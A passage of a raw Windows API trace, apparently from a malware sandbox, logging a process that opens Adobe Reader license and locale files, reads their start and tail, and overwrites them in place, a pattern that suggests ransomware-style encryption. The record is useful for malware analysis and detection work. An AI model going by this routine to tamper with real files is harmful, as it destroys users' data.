lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x331f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0078.025] CloseHandle (hObject=0x204) returned 1 [0078.025] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cat\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0078.026] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.026] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xd11a [0078.026] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.026] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.026] ReleaseMutex (hMutex=0x168) returned 1 [0078.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0078.026] ReadFile (in: hFile=0x204, lpBuffer=0x2693be8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.046] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xc11a [0078.046] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.073] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xc11a [0078.073] WriteFile (in: hFile=0x204, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.073] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0078.073] WriteFile (in: hFile=0x204, lpBuffer=0x25a8078*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a8078*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.074] CloseHandle (hObject=0x204) returned 1 [0078.074] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\dan\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0078.074] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.075] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xbd79 [0078.075] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.075] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.075] ReleaseMutex (hMutex=0x168) returned 1 [0078.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0078.075] ReadFile (in: hFile=0x204, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.079] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xad79 [0078.079] ReadFile (in: hFile=0x204, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.082] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xad79 [0078.082] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.083] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0078.083] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.083] CloseHandle (hObject=0x204) returned 1 [0078.084] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\euq\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0078.084] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.084] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xaedb [0078.085] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.085] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.085] ReleaseMutex (hMutex=0x168) returned 1 [0078.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f735ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0078.085] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.094] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x9edb [0078.094] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.513] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x9edb [0078.513] WriteFile (in: hFile=0x204, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.514] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0078.514] WriteFile (in: hFile=0x204, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.514] CloseHandle (hObject=0x204) returned 1 [0078.515] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0078.516] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.516] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xc60d [0078.517] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.517] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.517] ReleaseMutex (hMutex=0x168) returned 1 [0078.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0078.517] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.524] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xb60d [0078.524] ReadFile (in: hFile=0x204, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.559] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xb60d [0078.561] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.561] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0078.561] WriteFile (in: hFile=0x204, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.561] CloseHandle (hObject=0x204) returned 1 [0078.562] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0078.562] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.562] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xba2a [0078.563] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.563] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.563] ReleaseMutex (hMutex=0x168) returned 1 [0078.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0078.563] ReadFile (in: hFile=0x204, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.565] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xaa2a [0078.565] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.566] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xaa2a [0078.567] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.567] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0078.567] WriteFile (in: hFile=0x204, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.567] CloseHandle (hObject=0x204) returned 1 [0078.568] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rus\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0078.569] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.569] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3ece3 [0078.569] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.569] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.569] ReleaseMutex (hMutex=0x168) returned 1 [0078.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0078.570] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0078.644] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3dce3 [0078.644] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.659] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3dce3 [0078.660] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.660] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0078.661] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0078.661] CloseHandle (hObject=0x204) returned 1 [0078.661] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0078.662] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.662] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xc8bf [0078.662] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.662] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.662] ReleaseMutex (hMutex=0x168) returned 1 [0078.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0078.663] ReadFile (in: hFile=0x204, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.665] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xb8bf [0078.666] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.688] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xb8bf [0078.688] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.689] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0078.689] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.689] CloseHandle (hObject=0x204) returned 1 [0078.689] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Annots.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\annots.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0078.690] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.690] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x7d400 [0078.690] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.690] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.690] ReleaseMutex (hMutex=0x168) returned 1 [0078.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.CAT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0078.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.CAT", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.CAT", lpUsedDefaultChar=0x0) returned 10 [0078.691] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0078.698] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x7c400 [0078.699] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.701] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x7c400 [0078.702] WriteFile (in: hFile=0x204, lpBuffer=0x25ad0d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.702] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0078.702] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, 